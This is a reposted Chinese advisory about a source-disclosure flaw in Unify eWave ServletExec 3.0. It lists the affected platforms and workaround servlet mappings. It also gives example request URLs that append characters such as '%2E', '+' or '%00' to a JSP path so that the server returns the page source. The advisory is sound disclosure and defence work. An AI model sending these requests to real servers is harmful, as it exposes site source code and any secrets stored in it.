Unify eWave ServletExec 泄露jsp源代码漏洞

2016-02-19 15:12 5 1 收藏

在这个颜值当道,屌丝闪边的时代,拼不过颜值拼内涵,只有知识丰富才能提升一个人的内在气质和修养,所谓人丑就要多学习,今天图老师给大家分享Unify eWave ServletExec 泄露jsp源代码漏洞,希望可以对大家能有小小的帮助。

【 tulaoshi.com - Web开发 】

涉及程序:
  ServletExec
  
  描述:
  在HTTP请求中添加特殊字符导致暴露JSP源代码文件
  
  详细:
  Unify eWave ServletExec 是一个 Java/Java Servlet 引擎插件,主要用于 WEB 服务器,例如:Microsoft IIS, Apache, Netscape Enterprise 服务器等等。
  
  当一个 HTTP 请求中添加下列字符之一,ServletExec 将返回 JSP 源代码文件。
  .
  %2E
  +
  %2B
  
  %5C
  %20
  %00
  
  成功的利用该漏洞将导致泄露指定的JSP文件的源代码
  
  例如:
  使用下面的任意一个URL请求将输出指定的JSP文件的源代码:
  http://target/directory/jsp/file.jsp.
  http://target/directory/jsp/file.jsp%2E
  http://target/directory/jsp/file.jsp+
  http://target/directory/jsp/file.jsp%2B
  http://target/directory/jsp/file.jsp
  http://target/directory/jsp/file.jsp%5C
  http://target/directory/jsp/file.jsp%20
  http://target/directory/jsp/file.jsp%00
  
  受影响的系统:
  Unify eWave ServletExec 3.0c
  - Sun Solaris 8.0
  - Microsoft Windows 98
  - Microsoft Windows NT 4.0
  - Microsoft Windows NT 2000
  - Linux kernel 2.3.x
  - IBM AIX 4.3.2
  - HP HP-UX 11.4
  Unify eWave ServletExec 3.0
  - Sun Solaris 8.0
  - Microsoft Windows 98
  - Microsoft Windows NT 4.0
  - Microsoft Windows NT 2000
  - Linux kernel 2.3.x
  - IBM AIX 4.3.2
  - HP HP-UX 11.4
  
  解决方案:
  临时解决办法:
  如果没有使用任何静态页面或图像,可以配置一个默认的 servlet,并将“/”映射到这个默认的 servlet。这样当收到一个未映射到某个 servlet 的 URL 时,这个默认的servlet 就会被调用。在这种情况下,默认的 servlet 可以仅仅返回“未找到文件”。如果使用了静态的页面或图像,仍然可以作这样的配置,但是需要让这个默认的servlet 处理对合法的静态页面和图像的请求。
  
  另一种可能就是将*.jsp+、*.jsp.和*.jsp等映射到一个 servlet,而该servlet只是返回“未找到文件”。对于*.jsp%00和*.jsp%20这样的情况,映射应以未经编码的形式输入。例如,对于*.jsp%20的映射应输入“*.jsp ”。注意%20被转换成一个空格字符。
  

来源:http://www.tulaoshi.com/n/20160219/1609147.html

延伸阅读
标签: Java JAVA基础
  作 者: precom (皮蛋) 其中的opDb.java ============================================ package ymbean; import java.sql.*; import java.util.*; import java.text.*; import com.chinazjj.sql.dsql; import com.chinazjj.util.dutil; //其他的包dsql,dutil中的内容我就不再贴了,在本文件中用到的两个函数都很简 单 publ...
标签: Java JAVA基础
涉及程序: IBM WebSphere Application Server 3.0.2 描述: IBM WebSphere Application Server 3.0.2 存在暴露源代码漏洞 详细: IBM WebSphere Application Server 允许攻击者查看 Web server 根目录以上的所有文件。IBM WebSphere 使用 Java Servlets 处理多种页面类型的分析(如 HTML, JSP, JHTML, 等等)。In addition 不同的 servle...
标签: Java JAVA基础
  jsp留言板源代码一: 给jsp初学者. 作 者: precom (皮蛋) oracle数据表创建. create table guestbook ( lw_title varchar2(100) not null, --留言主题 lw_author varchar2(20) not null, --网上大名 pk author_http varchar2(40) , --主页地址 author_email varchar2(40) not null,--电子信箱 pk expression varchar2(2) not nu...
标签: Java JAVA基础
  作 者: precom (皮蛋) 2000.12.10 guestbook.jsp =========================== <html<head <META content="text/html; charset=gb2312 " http-equiv=Content-Type <title张家界电话黄页(网上114)</title</head <style type="text/css" <!-- BODY { FONT-FAMILY: "宋体"...
标签: Java JAVA基础
  综述:服务器漏洞是安全问题的起源,黑客对网站的攻击也大多是从查找对方的漏洞开始的。所以只有了解自身的漏洞,网站管理人员才能采取相应的对策,阻止外来的攻击。下面介绍一下一些服务器(包括Web服务器和JSP服务器)的常见漏洞。 Apache泄露重写的任意文件漏洞是怎么回事? 在Apache1.2以及以后的版本中存在一个mod...

经验教程

679

收藏

86

精华推荐

Jive源代码研究

Jive源代码研究

帮我想个女拐名

AJAX 请求 源代码

AJAX 请求 源代码

祸国殃民的羊

解密ASP源代码

解密ASP源代码

Q11183618

微博分享 QQ分享 QQ空间 手机页面 收藏网站 回到头部